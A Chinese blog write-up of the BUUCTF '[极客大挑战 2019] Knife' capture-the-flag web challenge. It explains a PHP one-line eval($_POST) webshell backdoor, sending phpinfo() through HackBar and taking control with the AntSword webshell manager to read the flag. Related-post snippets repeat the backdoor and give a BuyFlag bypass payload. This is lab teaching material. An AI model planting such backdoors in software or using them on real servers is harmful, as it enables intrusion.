BUUCTF WEB 极客大挑战 2019 Knife

最新推荐文章于 2023-04-27 21:54:54 发布
最新推荐文章于 2023-04-27 21:54:54 发布
阅读量359 收藏
点赞数
分类专栏: BUUCTF 文章标签: 网络安全 web php shell
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Ethan552525/article/details/119335352
版权

题目:

 解题:

1:一句话木马

        形式:<?php eval($_POST['shell']);?>

        原理:存在一个名为shell的变量,shell的取值为HTTP的POST方式。Web服务器对shell取值以后,然后通过eval()函数执行shell里面的内容。

2:尝试用HackBar传数据

HackBar:chrome插件,是web渗透的SQL注入工具。

插件下载:https://github.com/Mr-xn/hackbar2.1.3

插件安装:将下载的压缩包HackBar-v2.3.1.zip拖到chrome扩展程序安装页即可

插件激活:在扩展程序里,点击hackbar插件详细信息,点击加载来源

                   找到..\theme\js\hackbar-panel.js文件,按下图进行对应的修改。 

        Load URL加载当前链接,Post data为Syc=phpinfo(); 如下图:

         点击Execute即可发送数据,执行phpinfo()命令:

3:用AntSword连接

蚁剑:一 款比菜刀还牛的shell控制端软件,是一款开源的跨平台网站管理工具,它主要面向于合法授权的渗透测试安全人员以及进行常规操作的网站管理员。

下载:需要下载两个部分,一个是项目核心源码antSword,另一个是加载器antsword-loader;下载地址为https://github.com/AntSwordProject/

安装:打开运行加载器,初始化时,选择源码antSword所在文件夹即可。

        添加数据:填写URL地址,连接密码Syc,如图:

         双击运行数据,连接成功如图:

        然后在所有目录下尝试查找flag或有用信息: 

        该flag.txt为空的,迷惑信息,最终在根目录找到flag文件: 

Ethan552525
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
[BUUCTF012][极客挑战 2019]Knife 1
m0_52674595的博客
12-04 2309
[BUUCTF012] [极客挑战 2019]Knife 1 看到题目 knife 第一反应 猜测可能是中国菜刀题 进来一看 eval($_POST["Syc"]); 这是一个典型的后门程序 //eval — 把字符串bai作为PHP代码执行 eval('echo 123;');//输出123 有的字符串放入到eval当中,eval会把字符串解析为php代码来进行执行,那么结合$_POST[‘posha’]的话,只要使用post传输时在name为posha的值中写入任何字符串,都可以当做php代码
[极客挑战 2019] web题-Knife
BROTHERYY的博客
07-07 246
复现环境:buuoj.cn 进入环境得到提示 白给了兄弟! 直接上菜刀或者蚁剑 连上以后直接到根目录去找!
CTF-Web-[极客挑战 2019]Knife
归子莫的博客
05-03 5719
CTF-Web-[极客挑战 2019]Knife 博客说明 文章所涉及的资料来自互联网整理和个人总结,意在于个人学习和经验汇总,如有什么地方侵权,请联系本人删除,谢谢!本文仅用于学习与交流,不得用于非法用途! CTP平台 网址 https://buuoj.cn/challenges 题目 Web类,[极客挑战 2019]Knife 打开题目的实例 思路 看到这种题目,首先到处点一点,看...
web-[极客挑战 2019]Knife
wojiushilsy的博客
04-28 354
题目要点题目内容解题 题目要点 菜刀 题目内容 解题 菜刀直接连接。 找到flag。
BUUCTF__[极客挑战 2019]Knife_题解
风过江南乱的博客
05-22 1931
前言 想做前面那题高明的黑客,可是没学过python不会写脚本。。。而且看wp也感觉脚本也挺复杂的,以后再说吧,看来是得赶紧学习python了。 再说这题,从打开到拿到 flag ,可能还没有一分钟,着实简单。哈哈哈,可能这就是秒题吧。 看题 一看就是要用shell 连接了 F12 也没有什么提示。但发现说白给的shell。 白给,怎么白给,在哪???白嫖一下 但想想 shell 肯定肯定是PHP文件了。而一般网站都会有 index.php 所以尝试一下用蚁剑连接 index.
大文件切割利器Knife
08-28
1. 可以精准、快速地切割/复原任何大文件,一个字节也不差。  本款大文件分割软件最大的特色是,对于大小超过4GB的所谓“巨型”文件,也可轻松、快速地分割/复原,只要你可用的存储空间足够。  2. 支持分割的...
大文件切割器-knife
04-05
可以把任意类型的大文件分割成很多小文件,然后在另一个地方,把那些小文件还原成大文件,因为就是简单的分割与合并,所以理论上是兼容其他分割文件工具的。支持4G以上的大文件分割,针对多线程和大文件做了优化,...
Knife4j官网(源代码)
02-21
Knife4j官网 一、官网 二、简介 三、快速开始(Spring Boot 2 + OpenAPI2) 四、Spring Boot 2 4.1 OpenAPI2 4.2 OpenAPI3 五、迭代计划 六、介绍 七、实战指南 7.1 Spring单体架构 7.1.1 基于Maven Bom方式使用 7.1.2...
Knife4File大文件分割
09-05
Knife4File大文件分割 nife for File 大文件切割器 ----------------------------------------------------------------------------------------------------- 1.可以精确切割/复原文件,巨型文件(>4GB)也可搞定,...
Springboot使用Knife4j
03-16
Knife4j则是针对Spring Boot的一款增强工具,主要用于文档的生成和展示,极大地提升了开发者在API接口开发过程中的效率。这篇内容我们将深入探讨如何在SpringBoot项目中有效地使用Knife4j。 首先,我们需要理解...
BUUCTF做题笔记 Knife
m0_46576074的博客
05-11 795
[极客挑战 2019]Knife 进入页面 使用中国蚁剑连接 URL地址 http://4494b277-e30d-40a0-abdf-423e44f664fe.node3.buuoj.cn/?Knife.php 密码 Syc 添加;连接 ;打开文件管理 找到flag
buuctf [极客挑战 2019]Http1
weixin_63289925的博客
04-07 4928
啥也没有,查看网页源代码 看到了一个不一样的东西,url+/Secret.php进行访问 图是我们不是从https://Sycsecret.buuoj.cn这个地方来的,我们就欺骗它从这个地方去试试 需要使用到HTTP Referer伪造 Referer是header的一部分,当浏览器向web服务器发送请求的时候,一般会带上Referer,告诉服务器我是从哪个页面链接过来的,服务器籍此可以获得一些信息用于处理。” 方法一:使用bp抓包,在最后一行加上Referer:https://...
网络安全AntSword(蚁剑)入门+实战
等风来
04-27 3745
蚁剑(AntSword)是一款开源的跨平台WebShell管理工具,它主要面向于合法授权的渗透测试安全人员以及进行常规操作的网站管理员。中国蚁剑的特点主要有如下几点:1.支持多平台。包括macOS、Linux 32位、Linux 64位、Linux armv7l、Linux arm64、Windows 32位、Windows 64位。2.完善的文档。中国蚁剑文档地址。3.多项功能。文件管理功能、虚拟终端功能、数据库管理功能。4.内置代理功能。
中国蚁剑(AntSword)安装、使用教程
热门推荐
凝聚力安全团队
08-24 9万+
项目地址 加载器: https://github.com/eastmountyxz/AntSword-Experiment/ 项目核心源码: https://github.com/yuyuko233/AntSword 如果从github上下载很卡,可以去复制链接到githubd上下载 https://githubd.com 安装教程 我使用的渗透机为windows10,下载好会包含两个文件: 使用教程 插件安装 ...
中国蚁剑(AntSword)安装
good good study
03-11 3693
首先,蚁剑分为两个部分,一个是核心源码,另一个是加载器,所以我们需要下载源码和加载器
webshell管理工具-antSword(蚁剑)的安装和管理
黄乔国PHP
03-12 6475
中国蚁剑是一款流行的网络安全工具,它由中国安全研究人员研发,主要用于测试和评估网络的安全性。蚁剑具有强大的功能,可以用于远程控制和管理服务器,包括文件管理、进程管理、端口扫描、SQL注入、WebShell等功能。它还可以在未授权的情况下访问和操纵目标系统,因此也被一些黑客用作恶意攻击的工具。尽管蚁剑具有一些有用的功能,但它也被广泛用于恶意活动中。因此,使用蚁剑应该遵循合法和道德原则,只用于合法的网络安全测试和评估。
中国蚁剑安装教程——antswordwebshell一句话木马
qq_53099802的博客
04-22 7449
antswordphp一话木马
BUUCTF-web Knife[极客挑战]wp
想喝奶茶的胖大海
03-16 1046
观察 网页名为 白给的shell 网页也提示Syc 尝试使用蚁剑连接 http://aa314dec-cd75-404d-89e8-0b6199329805.node3.buuoj.cn//?Knife.php 直接在var文件下找到flag
BUU_Web [极客挑战 2019]BuyFlag
qq_46635165的博客
09-27 297
打开解题网址,题目显示 buyflag ,找到页面 buyflag 入口: 页面跳转到 pay.php ,抓包,审查源码: 看到提示,需要以POST 方式提交 money 和 password ,于是构造 payload: 这里说一下is_numeric() 函数,主要作用是检测传入的字符串是否为数字或者数字字符串,如果是,返回TRUE,否则返回FALSE; 分析:利用 404abc 绕过is_numeric() ,再利用 PHP 弱类型比较 ; password=404abc&money=
knife4j和swagger
最新发布
06-01
knife4j是Swagger的增强版,它在Swagger的基础上进行了扩展,提供了更加友好的UI界面和更加丰富的功能,例如接口调试、在线文档编辑等。 具体来说,knife4j相对于Swagger的优点包括: 1. 更加美观的UI界面:...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值